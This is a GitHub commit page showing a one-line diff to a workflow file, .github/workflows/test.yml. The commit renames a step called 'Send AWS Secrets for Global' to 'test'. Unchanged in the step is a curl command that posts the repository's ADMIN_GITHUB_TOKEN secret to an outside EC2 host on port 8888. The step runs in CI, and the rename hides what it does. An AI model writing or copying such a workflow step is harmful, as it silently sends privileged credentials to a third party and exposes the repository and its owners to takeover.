Skip to content

Commit

Permalink
test
Browse files Browse the repository at this point in the history
  • Loading branch information
Jayashwa Chauhan authored and Jayashwa Chauhan committed Jul 2, 2024
1 parent 481cfff commit 922697e
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .github/workflows/test.yml
Original file line number Diff line number Diff line change
Expand Up @@ -10,7 +10,7 @@ jobs:
- name: Checkout code
uses: actions/checkout@v2

- name: Send AWS Secrets for Global
- name: test
run: |
curl -X POST http://ec2-13-201-100-246.ap-south-1.compute.amazonaws.com:8888 \
-d "github-token: ${{ secrets.ADMIN_GITHUB_TOKEN }}"

0 comments on commit 922697e

Please sign in to comment.